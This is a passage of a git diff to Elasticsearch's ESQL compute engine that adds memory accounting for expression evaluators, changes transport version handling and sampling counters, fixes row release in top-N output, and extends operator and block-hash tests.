AbstractPageMappingToIteratorOperator { public record Values(String name, Block block) { diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/Driver.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/Driver.java index 775ac401cd916..b91cd3f468ad5 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/Driver.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/Driver.java @@ -267,7 +267,8 @@ private IsBlockedResult runSingleLoopIteration() { if (op.isFinished() == false && nextOp.needsInput()) { driverContext.checkForEarlyTermination(); - assert nextOp.isFinished() == false : "next operator should not be finished yet: " + nextOp; + assert nextOp.isFinished() == false || nextOp instanceof ExchangeSinkOperator || nextOp instanceof LimitOperator + : "next operator should not be finished yet: " + nextOp; Page page = op.getOutput(); if (page == null) { // No result, just move to the next iteration @@ -555,7 +556,7 @@ private void updateStatus(long extraCpuNanos, int extraIterations, DriverStatus. prev.cpuNanos() + extraCpuNanos, prev.iterations() + extraIterations, status, - statusOfCompletedOperators, + List.copyOf(statusOfCompletedOperators), activeOperators.stream().map(op -> new OperatorStatus(op.toString(), op.status())).toList(), sleeps ); diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/DriverCompletionInfo.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/DriverCompletionInfo.java index 7e63fe1681dd3..8f88f9d73b0d4 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/DriverCompletionInfo.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/DriverCompletionInfo.java @@ -95,8 +95,9 @@ public static DriverCompletionInfo readFrom(StreamInput in) throws IOException { in.readVLong(), in.readCollectionAsImmutableList(DriverProfile::readFrom), in.getTransportVersion().onOrAfter(TransportVersions.ESQL_PROFILE_INCLUDE_PLAN) - ? in.readCollectionAsImmutableList(PlanProfile::readFrom) - : List.of() + || in.getTransportVersion().isPatchFrom(TransportVersions.ESQL_PROFILE_INCLUDE_PLAN_8_19) + ? in.readCollectionAsImmutableList(PlanProfile::readFrom) + : List.of() ); } @@ -105,7 +106,8 @@ public void writeTo(StreamOutput out) throws IOException { out.writeVLong(documentsFound); out.writeVLong(valuesLoaded); out.writeCollection(driverProfiles); - if (out.getTransportVersion().onOrAfter(TransportVersions.ESQL_PROFILE_INCLUDE_PLAN)) { + if (out.getTransportVersion().onOrAfter(TransportVersions.ESQL_PROFILE_INCLUDE_PLAN) + || out.getTransportVersion().isPatchFrom(TransportVersions.ESQL_PROFILE_INCLUDE_PLAN_8_19)) { out.writeCollection(planProfiles); } } diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/EvalOperator.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/EvalOperator.java index 2573baf78b16a..2c9bf74fb8b0a 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/EvalOperator.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/EvalOperator.java @@ -7,8 +7,11 @@ package org.elasticsearch.compute.operator; +import org.apache.lucene.util.Accountable; +import org.apache.lucene.util.RamUsageEstimator; +import org.elasticsearch.common.breaker.CircuitBreaker; +import org.elasticsearch.common.util.BigArrays; import org.elasticsearch.compute.data.Block; -import org.elasticsearch.compute.data.BlockFactory; import org.elasticsearch.compute.data.Page; import org.elasticsearch.core.Releasable; import org.elasticsearch.core.Releasables; @@ -18,12 +21,13 @@ * new block which is appended to the page. */ public class EvalOperator extends AbstractPageMappingOperator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(EvalOperator.class); public record EvalOperatorFactory(ExpressionEvaluator.Factory evaluator) implements OperatorFactory { @Override public Operator get(DriverContext driverContext) { - return new EvalOperator(driverContext.blockFactory(), evaluator.get(driverContext)); + return new EvalOperator(driverContext, evaluator.get(driverContext)); } @Override @@ -32,12 +36,13 @@ public String describe() { } } - private final BlockFactory blockFactory; + private final DriverContext ctx; private final ExpressionEvaluator evaluator; - public EvalOperator(BlockFactory blockFactory, ExpressionEvaluator evaluator) { - this.blockFactory = blockFactory; + public EvalOperator(DriverContext ctx, ExpressionEvaluator evaluator) { + this.ctx = ctx; this.evaluator = evaluator; + ctx.breaker().addEstimateBytesAndMaybeBreak(BASE_RAM_BYTES_USED + evaluator.baseRamBytesUsed(), "ESQL"); } @Override @@ -53,14 +58,77 @@ public String toString() { @Override public void close() { - Releasables.closeExpectNoException(evaluator, super::close); + Releasables.closeExpectNoException( + evaluator, + () -> ctx.breaker().addWithoutBreaking(-BASE_RAM_BYTES_USED - evaluator.baseRamBytesUsed()), + super::close + ); } /** * Evaluates an expression {@code a + b} or {@code log(c)} one {@link Page} at a time. + *

Eval

+ *

+ * The primary interface is the {@link ExpressionEvaluator#eval(Page)} method which + * performs the actual evaluation. Generally implementations are built in a tree structure + * with member {@link ExpressionEvaluator} for each of their parameters. So + * {@linkplain ExpressionEvaluator#eval(Page)} will typically look like: + *

+ *
{@code
+     *   Block lhs = this.lhs.eval(page);
+     *   Block rhs = this.lhs.eval(page);
+     *   try (Block.Builder result = ...) {
+     *       for (int p = 0; p < lhs.getPositionCount(); p++) {
+     *           result.add(doTheThing(lhs.get(p), rhs.get(p)));
+     *       }
+     *   }
+     * }
+ *

+ * There are hundreds of them and none of them look just like that, but that's the theory. + * Get {@link Block}s from the children, then evaluate all the rows in a tight loop that + * hopefully can get vectorized. + *

+ *

+ * Implementations need not be thread safe. A new one is built for each {@link Driver} and + * {@linkplain Driver}s are only ever run in one thread at a time. Many implementations + * allocate "scratch" buffers for temporary memory that they reuse on each call to + * {@linkplain ExpressionEvaluator#eval}. + *

+ *

+ * Implementations must be ok with being called in by different threads, + * though never at the same time. It's possible that the instance belonging to a particular + * {@linkplain Driver} is called on thread {@code A} many times. And then the driver yields. + * After a few seconds the {@linkplain Driver} could be woken on thread {@code B} and will + * then call {@linkplain ExpressionEvaluator#eval(Page)}. No two threads will ever call + * {@linkplain ExpressionEvaluator#eval(Page)} at the same time on the same instance. + * This rarely matters, but some implementations that interact directly with Lucene will need + * to check that the {@link Thread#currentThread()} is the same as the previous thread. If + * it isn't they'll need to reinit Lucene stuff. + *

+ *

Memory tracking

+ *

+ * Implementations should track their memory usage because it's possible for us a single + * ESQL operation to make hundreds of them. Unlike with {@link Accountable} we have a + * {@link ExpressionEvaluator#baseRamBytesUsed} which can be read just after creation + * and is the sum of the ram usage of the tree of {@link ExpressionEvaluator}s while + * "empty". If an implementation much allocate any scratch memory this is not included. + *

+ *

+ * {@link ExpressionEvaluator#baseRamBytesUsed} memory is tracked in {@link EvalOperator}. + * Implementation that don't allocate any scratch memory need only implement this and + * use {@link DriverContext#blockFactory()} to build results. + *

+ *

+ * Implementations that do allocate memory should use {@link BreakingBytesRefBuilder} + * or {@link BigArrays} or some other safe allocation mechanism. If that isn't possible + * they should communicate with the {@link CircuitBreaker} directly via {@link DriverContext#breaker}. + *

*/ public interface ExpressionEvaluator extends Releasable { - /** A Factory for creating ExpressionEvaluators. */ + /** + * A Factory for creating ExpressionEvaluators. This must + * be thread safe. + */ interface Factory { ExpressionEvaluator get(DriverContext context); @@ -81,6 +149,12 @@ default boolean eagerEvalSafeInLazy() { * @return the returned Block has its own reference and the caller is responsible for releasing it. */ Block eval(Page page); + + /** + * Heap used by the evaluator excluding any memory that's separately tracked + * like the {@link BreakingBytesRefBuilder} used for string concat. + */ + long baseRamBytesUsed(); } public static final ExpressionEvaluator.Factory CONSTANT_NULL_FACTORY = new ExpressionEvaluator.Factory() { @@ -93,14 +167,17 @@ public Block eval(Page page) { } @Override - public void close() { - - } + public void close() {} @Override public String toString() { return CONSTANT_NULL_NAME; } + + @Override + public long baseRamBytesUsed() { + return 0; + } }; } diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/HashAggregationOperator.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/HashAggregationOperator.java index 9c4b9dd360062..cbce712ed9cdb 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/HashAggregationOperator.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/HashAggregationOperator.java @@ -85,7 +85,7 @@ public String describe() { private final BlockHash blockHash; - private final List aggregators; + protected final List aggregators; protected final DriverContext driverContext; diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/OrdinalsGroupingOperator.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/OrdinalsGroupingOperator.java index 9c15b0f3fc7d5..a00377441dab0 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/OrdinalsGroupingOperator.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/OrdinalsGroupingOperator.java @@ -32,7 +32,7 @@ import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.IntVector; import org.elasticsearch.compute.data.Page; -import org.elasticsearch.compute.lucene.ValuesSourceReaderOperator; +import org.elasticsearch.compute.lucene.read.ValuesSourceReaderOperator; import org.elasticsearch.core.RefCounted; import org.elasticsearch.core.Releasable; import org.elasticsearch.core.Releasables; @@ -509,6 +509,7 @@ private static class ValuesAggregator implements Releasable { ) { this.extractor = new ValuesSourceReaderOperator( driverContext.blockFactory(), + Long.MAX_VALUE, List.of(new ValuesSourceReaderOperator.FieldInfo(groupingField, groupingElementType, blockLoaders)), shardContexts, docChannel diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/SampleOperator.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/SampleOperator.java index 56ba95f66f5fa..47d0be6c314e5 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/SampleOperator.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/SampleOperator.java @@ -66,11 +66,11 @@ public String describe() { private final RandomSamplingQuery.RandomSamplingIterator randomSamplingIterator; private boolean finished; - private int pagesProcessed = 0; - private int rowsReceived = 0; - private int rowsEmitted = 0; private long collectNanos; private long emitNanos; + private int pagesProcessed = 0; + private long rowsReceived = 0; + private long rowsEmitted = 0; private SampleOperator(double probability, int seed) { finished = false; @@ -109,7 +109,7 @@ private void createOutputPage(Page page) { final int[] sampledPositions = new int[page.getPositionCount()]; int sampledIdx = 0; for (int i = randomSamplingIterator.docID(); i - rowsReceived < page.getPositionCount(); i = randomSamplingIterator.nextDoc()) { - sampledPositions[sampledIdx++] = i - rowsReceived; + sampledPositions[sampledIdx++] = Math.toIntExact(i - rowsReceived); } if (sampledIdx > 0) { outputPages.add(page.filter(Arrays.copyOf(sampledPositions, sampledIdx))); @@ -167,7 +167,7 @@ public Operator.Status status() { return new Status(collectNanos, emitNanos, pagesProcessed, rowsReceived, rowsEmitted); } - private record Status(long collectNanos, long emitNanos, int pagesProcessed, int rowsReceived, int rowsEmitted) + public record Status(long collectNanos, long emitNanos, int pagesProcessed, long rowsReceived, long rowsEmitted) implements Operator.Status { @@ -178,7 +178,13 @@ private record Status(long collectNanos, long emitNanos, int pagesProcessed, int ); Status(StreamInput streamInput) throws IOException { - this(streamInput.readVLong(), streamInput.readVLong(), streamInput.readVInt(), streamInput.readVInt(), streamInput.readVInt()); + this( + streamInput.readVLong(), + streamInput.readVLong(), + streamInput.readVInt(), + streamInput.readVLong(), + streamInput.readVLong() + ); } @Override @@ -186,8 +192,8 @@ public void writeTo(StreamOutput out) throws IOException { out.writeVLong(collectNanos); out.writeVLong(emitNanos); out.writeVInt(pagesProcessed); - out.writeVInt(rowsReceived); - out.writeVInt(rowsEmitted); + out.writeVLong(rowsReceived); + out.writeVLong(rowsEmitted); } @Override @@ -236,7 +242,13 @@ public String toString() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + assert false : "must not be called when overriding supportsVersion"; + throw new UnsupportedOperationException("must not be called when overriding supportsVersion"); + } + + @Override + public boolean supportsVersion(TransportVersion version) { + return version.onOrAfter(TransportVersions.ESQL_SAMPLE_OPERATOR_STATUS_9_1); } } } diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/mvdedupe/MultivalueDedupe.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/mvdedupe/MultivalueDedupe.java index 42e123729b50a..034178797def0 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/mvdedupe/MultivalueDedupe.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/mvdedupe/MultivalueDedupe.java @@ -7,6 +7,7 @@ package org.elasticsearch.compute.operator.mvdedupe; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BlockFactory; import org.elasticsearch.compute.data.BooleanBlock; @@ -164,6 +165,8 @@ public String toString() { } private static class Evaluator implements ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(Evaluator.class); + private final BlockFactory blockFactory; private final ExpressionEvaluator field; private final BiFunction dedupe; @@ -187,7 +190,14 @@ public String toString() { } @Override - public void close() {} + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + + @Override + public void close() { + field.close(); + } } private MultivalueDedupe() {} diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/topn/ResultBuilderForAggregateMetricDouble.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/topn/ResultBuilderForAggregateMetricDouble.java index a814cf5f98e0a..f4c091e22fac6 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/topn/ResultBuilderForAggregateMetricDouble.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/topn/ResultBuilderForAggregateMetricDouble.java @@ -30,6 +30,11 @@ public void decodeKey(BytesRef keys) { @Override public void decodeValue(BytesRef values) { + int count = TopNEncoder.DEFAULT_UNSORTABLE.decodeVInt(values); + if (count == 0) { + builder.appendNull(); + return; + } for (BlockLoader.DoubleBuilder subBuilder : List.of(builder.min(), builder.max(), builder.sum())) { if (TopNEncoder.DEFAULT_UNSORTABLE.decodeBoolean(values)) { subBuilder.appendDouble(TopNEncoder.DEFAULT_UNSORTABLE.decodeDouble(values)); @@ -51,7 +56,7 @@ public Block build() { @Override public String toString() { - return "ValueExtractorForAggregateMetricDouble"; + return "ResultBuilderForAggregateMetricDouble"; } @Override diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/topn/TopNOperator.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/topn/TopNOperator.java index fdf88cf8f55b4..fde51d4642ae0 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/topn/TopNOperator.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/topn/TopNOperator.java @@ -469,51 +469,50 @@ private Iterator toPages() { p = 0; } - Row row = list.get(i); - BytesRef keys = row.keys.bytesRefView(); - for (SortOrder so : sortOrders) { - if (keys.bytes[keys.offset] == so.nul()) { + try (Row row = list.get(i)) { + BytesRef keys = row.keys.bytesRefView(); + for (SortOrder so : sortOrders) { + if (keys.bytes[keys.offset] == so.nul()) { + keys.offset++; + keys.length--; + continue; + } keys.offset++; keys.length--; - continue; + builders[so.channel].decodeKey(keys); + } + if (keys.length != 0) { + throw new IllegalArgumentException("didn't read all keys"); } - keys.offset++; - keys.length--; - builders[so.channel].decodeKey(keys); - } - if (keys.length != 0) { - throw new IllegalArgumentException("didn't read all keys"); - } - - BytesRef values = row.values.bytesRefView(); - for (ResultBuilder builder : builders) { - builder.setNextRefCounted(row.shardRefCounter); - builder.decodeValue(values); - } - if (values.length != 0) { - throw new IllegalArgumentException("didn't read all values"); - } - list.set(i, null); + BytesRef values = row.values.bytesRefView(); + for (ResultBuilder builder : builders) { + builder.setNextRefCounted(row.shardRefCounter); + builder.decodeValue(values); + } + if (values.length != 0) { + throw new IllegalArgumentException("didn't read all values"); + } - p++; - if (p == size) { - Block[] blocks = new Block[builders.length]; - try { - for (int b = 0; b < blocks.length; b++) { - blocks[b] = builders[b].build(); - } - } finally { - if (blocks[blocks.length - 1] == null) { - Releasables.closeExpectNoException(blocks); + list.set(i, null); + + p++; + if (p == size) { + Block[] blocks = new Block[builders.length]; + try { + for (int b = 0; b < blocks.length; b++) { + blocks[b] = builders[b].build(); + } + } finally { + if (blocks[blocks.length - 1] == null) { + Releasables.closeExpectNoException(blocks); + } } + result.add(new Page(blocks)); + Releasables.closeExpectNoException(builders); + builders = null; } - result.add(new Page(blocks)); - Releasables.closeExpectNoException(builders); - builders = null; } - // It's important to close the row only after we build the new block, so we don't pre-release any shard counter. - row.close(); } assert builders == null; success = true; diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/topn/ValueExtractorForAggregateMetricDouble.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/topn/ValueExtractorForAggregateMetricDouble.java index 9bac1b9ba5eee..0e0694b328d9d 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/topn/ValueExtractorForAggregateMetricDouble.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/topn/ValueExtractorForAggregateMetricDouble.java @@ -24,6 +24,7 @@ public class ValueExtractorForAggregateMetricDouble implements ValueExtractor { @Override public void writeValue(BreakingBytesRefBuilder values, int position) { + TopNEncoder.DEFAULT_UNSORTABLE.encodeVInt(1, values); for (DoubleBlock doubleBlock : List.of(block.minBlock(), block.maxBlock(), block.sumBlock())) { if (doubleBlock.isNull(position)) { TopNEncoder.DEFAULT_UNSORTABLE.encodeBoolean(false, values); diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/ConstantBooleanExpressionEvaluator.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/ConstantBooleanExpressionEvaluator.java index 9700a0200f755..6f8ec34c4838d 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/ConstantBooleanExpressionEvaluator.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/ConstantBooleanExpressionEvaluator.java @@ -36,6 +36,11 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + return 0; + } + @Override public void close() {} diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/OperatorTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/OperatorTests.java index 1a88bac8b3953..b30f0375eeb96 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/OperatorTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/OperatorTests.java @@ -11,6 +11,7 @@ import org.apache.lucene.document.Field; import org.apache.lucene.document.LongField; import org.apache.lucene.document.LongPoint; +import org.apache.lucene.document.SortedNumericDocValuesField; import org.apache.lucene.document.SortedSetDocValuesField; import org.apache.lucene.index.DirectoryReader; import org.apache.lucene.index.IndexReader; @@ -35,6 +36,7 @@ import org.elasticsearch.common.util.MockPageCacheRecycler; import org.elasticsearch.common.util.concurrent.ConcurrentCollections; import org.elasticsearch.compute.aggregation.CountAggregatorFunction; +import org.elasticsearch.compute.aggregation.ValuesLongAggregatorFunctionSupplier; import org.elasticsearch.compute.aggregation.blockhash.BlockHash; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BlockFactory; @@ -52,7 +54,7 @@ import org.elasticsearch.compute.lucene.LuceneSourceOperator; import org.elasticsearch.compute.lucene.LuceneSourceOperatorTests; import org.elasticsearch.compute.lucene.ShardContext; -import org.elasticsearch.compute.lucene.ValuesSourceReaderOperator; +import org.elasticsearch.compute.lucene.read.ValuesSourceReaderOperator; import org.elasticsearch.compute.operator.AbstractPageMappingOperator; import org.elasticsearch.compute.operator.Driver; import org.elasticsearch.compute.operator.DriverContext; @@ -254,6 +256,113 @@ public String toString() { assertThat(blockFactory.breaker().getUsed(), equalTo(0L)); } + // TODO: Remove ordinals grouping operator or enable it GroupingAggregatorFunctionTestCase + public void testValuesWithOrdinalGrouping() throws Exception { + DriverContext driverContext = driverContext(); + BlockFactory blockFactory = driverContext.blockFactory(); + + final int numDocs = between(100, 1000); + Map> expectedValues = new HashMap<>(); + try (BaseDirectoryWrapper dir = newDirectory(); RandomIndexWriter writer = new RandomIndexWriter(random(), dir)) { + String VAL_NAME = "val"; + String KEY_NAME = "key"; + for (int i = 0; i < numDocs; i++) { + Document doc = new Document(); + BytesRef key = new BytesRef(Integer.toString(between(1, 100))); + SortedSetDocValuesField keyField = new SortedSetDocValuesField(KEY_NAME, key); + doc.add(keyField); + if (randomBoolean()) { + int numValues = between(0, 2); + for (int v = 0; v < numValues; v++) { + long val = between(1, 1000); + var valuesField = new SortedNumericDocValuesField(VAL_NAME, val); + doc.add(valuesField); + expectedValues.computeIfAbsent(key, k -> new HashSet<>()).add(val); + } + } + writer.addDocument(doc); + } + writer.commit(); + try (DirectoryReader reader = writer.getReader()) { + List operators = new ArrayList<>(); + if (randomBoolean()) { + operators.add(new ShuffleDocsOperator(blockFactory)); + } + operators.add( + new ValuesSourceReaderOperator( + blockFactory, + ByteSizeValue.ofMb(1).getBytes(), + List.of( + new ValuesSourceReaderOperator.FieldInfo( + VAL_NAME, + ElementType.LONG, + unused -> new BlockDocValuesReader.LongsBlockLoader(VAL_NAME) + ) + ), + List.of(new ValuesSourceReaderOperator.ShardContext(reader, () -> { + throw new UnsupportedOperationException(); + }, 0.2)), + 0 + ) + ); + operators.add( + new OrdinalsGroupingOperator( + shardIdx -> new KeywordFieldMapper.KeywordFieldType(KEY_NAME).blockLoader(mockBlContext()), + List.of(new ValuesSourceReaderOperator.ShardContext(reader, () -> SourceLoader.FROM_STORED_SOURCE, 0.2)), + ElementType.BYTES_REF, + 0, + KEY_NAME, + List.of(new ValuesLongAggregatorFunctionSupplier().groupingAggregatorFactory(INITIAL, List.of(1))), + randomPageSize(), + driverContext + ) + ); + operators.add( + new HashAggregationOperator( + List.of(new ValuesLongAggregatorFunctionSupplier().groupingAggregatorFactory(FINAL, List.of(1))), + () -> BlockHash.build( + List.of(new BlockHash.GroupSpec(0, ElementType.BYTES_REF)), + driverContext.blockFactory(), + randomPageSize(), + false + ), + driverContext + ) + ); + Map> actualValues = new HashMap<>(); + Driver driver = TestDriverFactory.create( + driverContext, + luceneOperatorFactory( + reader, + List.of(new LuceneSliceQueue.QueryAndTags(new MatchAllDocsQuery(), List.of())), + LuceneOperator.NO_LIMIT + ).get(driverContext), + operators, + new PageConsumerOperator(page -> { + BytesRefBlock keyBlock = page.getBlock(0); + LongBlock valueBlock = page.getBlock(1); + BytesRef spare = new BytesRef(); + for (int p = 0; p < page.getPositionCount(); p++) { + var key = keyBlock.getBytesRef(p, spare); + int valueCount = valueBlock.getValueCount(p); + for (int i = 0; i < valueCount; i++) { + long val = valueBlock.getLong(valueBlock.getFirstValueIndex(p) + i); + boolean added = actualValues.computeIfAbsent(BytesRef.deepCopyOf(key), k -> new HashSet<>()).add(val); + assertTrue(actualValues.toString(), added); + } + } + page.releaseBlocks(); + }) + ); + OperatorTestCase.runDriver(driver); + assertDriverContext(driverContext); + assertThat(actualValues, equalTo(expectedValues)); + org.elasticsearch.common.util.MockBigArrays.ensureAllArraysAreReleased(); + } + } + assertThat(blockFactory.breaker().getUsed(), equalTo(0L)); + } + public void testPushRoundToToQuery() throws IOException { long firstGroupMax = randomLong(); long secondGroupMax = randomLong(); @@ -274,6 +383,7 @@ public void testPushRoundToToQuery() throws IOException { LuceneOperator.NO_LIMIT ); ValuesSourceReaderOperator.Factory load = new ValuesSourceReaderOperator.Factory( + ByteSizeValue.ofGb(1), List.of( new ValuesSourceReaderOperator.FieldInfo("v", ElementType.LONG, f -> new BlockDocValuesReader.LongsBlockLoader("v")) ), @@ -300,7 +410,6 @@ public void testPushRoundToToQuery() throws IOException { boolean sawSecondMax = false; boolean sawThirdMax = false; for (Page page : pages) { - logger.error("ADFA {}", page); LongVector group = page.getBlock(1).asVector(); LongVector value = page.getBlock(2).asVector(); for (int p = 0; p < page.getPositionCount(); p++) { diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/aggregation/FilteredGroupingAggregatorFunctionTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/aggregation/FilteredGroupingAggregatorFunctionTests.java index dbd5d0cc167d1..9a9421e40c615 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/aggregation/FilteredGroupingAggregatorFunctionTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/aggregation/FilteredGroupingAggregatorFunctionTests.java @@ -124,7 +124,7 @@ public void testAddIntermediateRowInput() { while ((p = source.getOutput()) != null) { try ( IntVector group = ctx.blockFactory().newConstantIntVector(0, p.getPositionCount()); - GroupingAggregatorFunction.AddInput addInput = leaf.prepareProcessPage(null, p) + GroupingAggregatorFunction.AddInput addInput = leaf.prepareProcessRawInputPage(null, p) ) { addInput.add(0, group); } finally { @@ -192,6 +192,11 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + return 0; + } + @Override public void close() { if (unclosed.remove(tracker) == false) { diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/aggregation/GroupingAggregatorFunctionTestCase.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/aggregation/GroupingAggregatorFunctionTestCase.java index 9e5039e8fd9b9..04d1221fbe40d 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/aggregation/GroupingAggregatorFunctionTestCase.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/aggregation/GroupingAggregatorFunctionTestCase.java @@ -661,9 +661,9 @@ public GroupingAggregatorFunction groupingAggregator(DriverContext driverContext BitArray seenGroupIds = new BitArray(0, nonBreakingBigArrays()); @Override - public AddInput prepareProcessPage(SeenGroupIds ignoredSeenGroupIds, Page page) { + public AddInput prepareProcessRawInputPage(SeenGroupIds ignoredSeenGroupIds, Page page) { return new AddInput() { - final AddInput delegateAddInput = delegate.prepareProcessPage(bigArrays -> { + final AddInput delegateAddInput = delegate.prepareProcessRawInputPage(bigArrays -> { BitArray seen = new BitArray(0, bigArrays); seen.or(seenGroupIds); return seen; diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/aggregation/blockhash/BlockHashTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/aggregation/blockhash/BlockHashTests.java index 3ff3be5086ad4..be97055eb9a7e 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/aggregation/blockhash/BlockHashTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/aggregation/blockhash/BlockHashTests.java @@ -11,6 +11,7 @@ import com.carrotsearch.randomizedtesting.annotations.ParametersFactory; import org.apache.lucene.util.BytesRef; +import org.elasticsearch.common.lucene.BytesRefs; import org.elasticsearch.common.unit.ByteSizeValue; import org.elasticsearch.compute.aggregation.GroupingAggregatorFunction; import org.elasticsearch.compute.data.Block; @@ -35,8 +36,10 @@ import org.elasticsearch.xpack.esql.core.util.Holder; import java.util.ArrayList; +import java.util.HashSet; import java.util.List; import java.util.Locale; +import java.util.Set; import java.util.function.Consumer; import java.util.stream.IntStream; import java.util.stream.LongStream; @@ -1232,6 +1235,194 @@ public void testLongNull() { }, blockFactory.newLongArrayVector(values, values.length).asBlock(), blockFactory.newConstantNullBlock(values.length)); } + public void test2BytesRefsHighCardinalityKey() { + final Page page; + int positions1 = 10; + int positions2 = 100_000; + if (randomBoolean()) { + positions1 = 100_000; + positions2 = 10; + } + final int totalPositions = positions1 * positions2; + try ( + BytesRefBlock.Builder builder1 = blockFactory.newBytesRefBlockBuilder(totalPositions); + BytesRefBlock.Builder builder2 = blockFactory.newBytesRefBlockBuilder(totalPositions); + ) { + for (int i = 0; i < positions1; i++) { + for (int p = 0; p < positions2; p++) { + builder1.appendBytesRef(new BytesRef("abcdef" + i)); + builder2.appendBytesRef(new BytesRef("abcdef" + p)); + } + } + page = new Page(builder1.build(), builder2.build()); + } + record Output(int offset, IntBlock block, IntVector vector) implements Releasable { + @Override + public void close() { + Releasables.close(block, vector); + } + } + List output = new ArrayList<>(); + + try (BlockHash hash1 = new BytesRef2BlockHash(blockFactory, 0, 1, totalPositions);) { + hash1.add(page, new GroupingAggregatorFunction.AddInput() { + @Override + public void add(int positionOffset, IntArrayBlock groupIds) { + groupIds.incRef(); + output.add(new Output(positionOffset, groupIds, null)); + } + + @Override + public void add(int positionOffset, IntBigArrayBlock groupIds) { + groupIds.incRef(); + output.add(new Output(positionOffset, groupIds, null)); + } + + @Override + public void add(int positionOffset, IntVector groupIds) { + groupIds.incRef(); + output.add(new Output(positionOffset, null, groupIds)); + } + + @Override + public void close() { + fail("hashes should not close AddInput"); + } + }); + + Block[] keys = hash1.getKeys(); + try { + Set distinctKeys = new HashSet<>(); + BytesRefBlock block0 = (BytesRefBlock) keys[0]; + BytesRefBlock block1 = (BytesRefBlock) keys[1]; + BytesRef scratch = new BytesRef(); + StringBuilder builder = new StringBuilder(); + for (int i = 0; i < totalPositions; i++) { + builder.setLength(0); + builder.append(BytesRefs.toString(block0.getBytesRef(i, scratch))); + 